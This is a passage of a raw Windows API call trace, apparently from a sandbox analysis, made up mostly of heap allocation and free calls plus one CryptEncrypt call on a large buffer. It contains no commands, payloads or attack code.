lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0203.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0203.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0203.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0203.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0203.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0203.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0203.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0203.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0203.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0203.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0203.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0203.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0203.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0203.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0203.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0203.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0203.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0203.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0203.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0203.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0203.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0203.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0203.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0203.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0203.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0203.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0203.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0203.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0203.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0203.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0203.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0203.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0203.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0203.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0203.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0203.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0203.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0203.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0203.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0203.036] CharLowerBuffW (in: lpsz="byte[754136]", cchLength=0xc | out: lpsz="byte[754136]") returned 0xc [0203.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0203.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0203.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0203.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0203.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0203.061] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.098] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.098] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0203.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0203.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0203.098] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0203.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0203.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0203.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0203.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0203.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0203.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0203.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0203.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0203.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0203.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0203.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0203.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0203.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0203.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0203.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0203.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0203.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0203.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0203.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0203.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0203.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0203.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0203.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0203.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0203.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0203.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0203.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0203.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0203.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0203.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0203.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0203.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0203.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0203.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0203.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0203.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0203.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0203.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0203.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0203.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0203.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0203.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0203.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0203.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0203.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0203.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0203.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0203.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0203.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb81d0) returned 0x1183020 [0203.164] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0203.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0203.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0203.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0203.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0203.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0203.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50ad0 [0203.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50ad0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0203.165] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10c4020*, pdwDataLen=0x8cef60*=0xb81d0, dwBufLen=0xb81d8 | out: pbData=0x10c4020*, pdwDataLen=0x8cef60*=0xb81d8) returned 1 [0203.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0203.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0203.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0203.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0203.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0203.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0203.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0203.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0203.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0203.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0203.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0203.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0203.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0203.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0203.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0203.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0203.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0203.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0203.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0203.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0203.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0203.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0203.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0203.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0203.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0203.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0203.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0203.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0203.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0203.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0203.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0203.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0203.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0203.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0203.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0203.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0203.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0203.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0203.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0203.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0203.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0203.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0203.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0203.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0203.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0203.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0203.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0203.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0203.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0203.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0203.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0203.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0203.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0203.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0203.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0203.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0203.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0203.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0203.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0203.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0203.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0203.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0203.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0203.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0203.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0203.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0203.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0203.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0203.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0203.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0203.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0203.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0203.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0203.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0203.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0203.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0203.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0203.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0203.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0203.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0203.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0203.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0203.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0203.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0203.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0203.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0203.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 